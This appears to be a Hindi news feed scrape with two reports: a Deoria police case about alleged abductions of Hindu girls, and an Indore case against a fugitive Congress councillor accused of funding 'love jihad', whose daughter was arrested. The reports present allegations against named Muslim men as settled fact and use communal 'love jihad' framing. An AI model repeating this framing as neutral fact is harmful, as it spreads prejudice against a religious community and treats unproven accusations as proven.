सी ओ रुद्रपुर हरिराम यादव ने बताया कि थाना गौरीबाजार देवरिया में दिनांक 28.07.2025 को महिला अपराध से संबंधित मु0अ0सं0 342/2025 पंजीकृत किया गया था, जिसमें अपहृता की बरामदगी के लिये टीम का गठन किया गया था, जिसमें अपहृता की सकुशल बरामदगी कर ली गयी है . साथ ही अभियुक्त को नियमानुसार गिरफ्तार कर जेल भेज दिया गया है. अग्रिम विधिक कार्यवाही प्रचलित है.

आपको बता दें कि गौरीबाजार थाना क्षेत्र में एक हफ्ते में दो अलग अलग क्षेत्रो में अन्य समुदाय के युवकों द्वारा हिन्दू लड़कियों को भगाया गया. पहला मामला 24 जुलाई को हुआ जो CCTV में कैद हुआ था. समीर अंसारी, हिन्दू नाबालिग लड़की को बुर्का पहना कर ले जाता दिखाई पड़ा था. इसे पुलिस ने गौरीबाजार से ही 4 दिन पूर्व गिरफ्तार कर लिया था लेकिन सूत्रों की मानें तो इसकी लोकेशन नेपाल के बुटवल में मिली थी. इन दोनों मामलों को लव जिहाद से जोड़ते हुए देवरिया सदर भाजपा विधायक शलभ मणि ने DGP को चिट्ठी लिखी थी जिसके बाद पुलिस की जांच पड़ताल तेज हुई और अब दोनों समीर और सैनुल सलाखों के पीछे है.

]]>
लव जिहाद फंडिंग केस में कांग्रेस पार्षद की बेटी दिल्ली से गिरफ्तार, अनवर कादरी फरार https://pratyushaashakinayikiran.com/?p=174048 Tue, 29 Jul 2025 09:45:00 +0000 https://pratyushaashakinayikiran.com/?p=174048 इंदौर 

इंदौर में लव जिहाद के लिए मुस्लिम युवकों को फंडिंग करने वाले कांग्रेस पार्षद अनवर कादरी ने दिल्ली में पुलिस को चकमा दे दिया, लेकिन पुलिस ने उसकी बेटी को गिरफ्तार कर लिया है। दोनो साथ में दिल्ली में थे और फर्जी सिमों के जरिए परिवार के अन्य सदस्यों के संपर्क में थे। कादरी पर इंदौर पुलिस ने बीस हजार रुपये का इनाम भी घोषित कर रखा है, लेकिन वह एक माह से पुलिस की गिरफ्त से बाहर है। कादरी पर कई अपराधिक मामले दर्ज है। उज्जैन में डकैती डालने के बाद उसके अनवर डकैत भी कहा जाता है।

अनवर पर केस दर्ज होने के बाद उसके परिवार के लोग भी घर पर ताला लगाकर फरार हो गए थे। अनवर की तलाश में इंदौर पुलिस दिल्ली गई थी। वहां से पुलिस ने अनवर की बेटी आयशा को गिरफ्तार किया है। उसे पुलिस ने कोर्ट में पेश किया है। कोर्ट ने 3 अगस्त तक उसका रिमांड दिया है। पुलिस आयशा से कादरी के बारे में पूछताछ करेगी।

पिता अनवर कादरी के संपर्क में थी आयशा सूत्रों के मुताबिक आयशा अपने पिता अनवर कादरी के साथ दिल्ली में थी। सोमवार को जब पुलिस ने दबिश दी तो अनवर वहां से फरार हो गया। जबकि आयशा पुलिस के हत्थे चढ़ गई।

कुछ दिन पहले ही लव जिहाद मामले में फंडिंग करने को लेकर अनवर कादरी पर 20 हजार का इनाम घोषित किया गया था। उसकी तलाश में उसके घर के साथ ही महाराष्ट्र के रिश्तेदारों के यहां भी दबिश दी गई। लेकिन, वह नहीं मिला।

इसके बाद घर के कुछ सदस्य भी फरार हो गए। आयशा और अनवर की कॉल डिटेल एक साथ सामने आई थी। दोनों फर्जी सिम लेकर परिवार के लोगों से बात कर रहे थे।

इंदौर के कांग्रेस पार्षद अनवर कादरी पर लव जिहाद और धर्मांतरण की साजिश चलाने के गंभीर आरोप हैं। उन पर18 आपराधिक मामले दर्ज है। लव जिहाद की फंडिंग के मामले में कादरी पर राष्ट्रीय सुरक्षा अधिनियम (NSA)के तहत गिरफ्तारी का आदेश जारी किया गया है। पुलिस ने पिछले दिनो दो मुस्लिम युवकों को गिरफ्तार किया था। युवकों ने पुलिस को बताया कि हिंदू लड़कियों को फंसा कर उनसे शादी करने के लिए कादरी ने उन्हें पैसे दिए थे। कादरी तीन बार कांग्रेस के टिकट से चुनाव लड़कर पार्षद रह चुका है। पार्षद पद से उसे अयोग्य घोषित करने की तैयारी भी चल रही है।

पकड़ने के लिए पुलिस ने इनाम कर दिया दोगुना, दे दी चेतावनी

 इंदौर में लव जिहाद मामले में फंडिंग करने वाले फरार कांग्रेस नेता पर पुलिस ने शिकंजा कसने के लिए एक और बड़ी घोषणा की है। महीने भर से फरार कांग्रेस पार्षद की गिरफ्तारी पर जो 10 हजार का इनाम घोषित था उसे अब बढ़ा दिया है। पुलिस ने कहा है कि पार्षद को गिरफ्तार करवाने वाले को 20 हजार रुपये दिए जाएंगे।

पुलिस अधिकारी राजेश दंडोतिया ने मीडिया को बताया कि लव जिहाद के फंडिंग मामले में स्थानीय कांग्रेस पार्षद अनवर कादरी उर्फ डकैत की गिरफ्तारी पर पुलिस के एक उपायुक्त ने 10,000 रुपये का इनाम घोषित किया था। इनाम की इस रकम को पुलिस के एक अतिरिक्त आयुक्त ने बढ़ाकर 20,000 रुपये कर दिया है। दंडोतिया ने बताया कि अगर अगले कुछ दिनों में कांग्रेस पार्षद गिरफ्तार नहीं होता है तो उसकी संपत्तियां कुर्क करने की कार्रवाई की जाएगी।

लव जिहाद के लिए फंडिंग करता था कांग्रेस पार्षद
बता दें कि कुछ दिनों पहले पुलिस ने लव जिहाद करने वाले दो मुस्लिम युवकों साहिल शेख और अल्ताफ शाह को दबोचा था। पूछताछ में दोनों ने बताया था कि कांग्रेस पार्षद अनवर कादरी इसके लिए फंडिंग करता था। ये युवक हिंदू लड़कियों को प्रेम जाल फंसाकर उनका धर्मांतरण करवाते थे। इन सबके लिए कादरी ने तीन लाख रुपए दिए थे।

कादरी के खिलाफ दर्ज हैं 18 मामले
दोनों युवकों के बयान के आधार पर कांग्रेस पार्षद कादरी के खिलाफ धन के दम पर धर्मांतरण की साजिश में शामिल होने के आरोप में मामला दर्ज किया गया था जिसके बाद कादरी फरार हो गया था। जिसके बाद पुलिस ने एनएसए के तहत कादरी को गिरफ्तार करने का आदेश जारी किया था। कादरी के खिलाफ शहर के अलग-अलग पुलिस थानों में 18 आपराधिक मामले दर्ज हैं।

 

]]>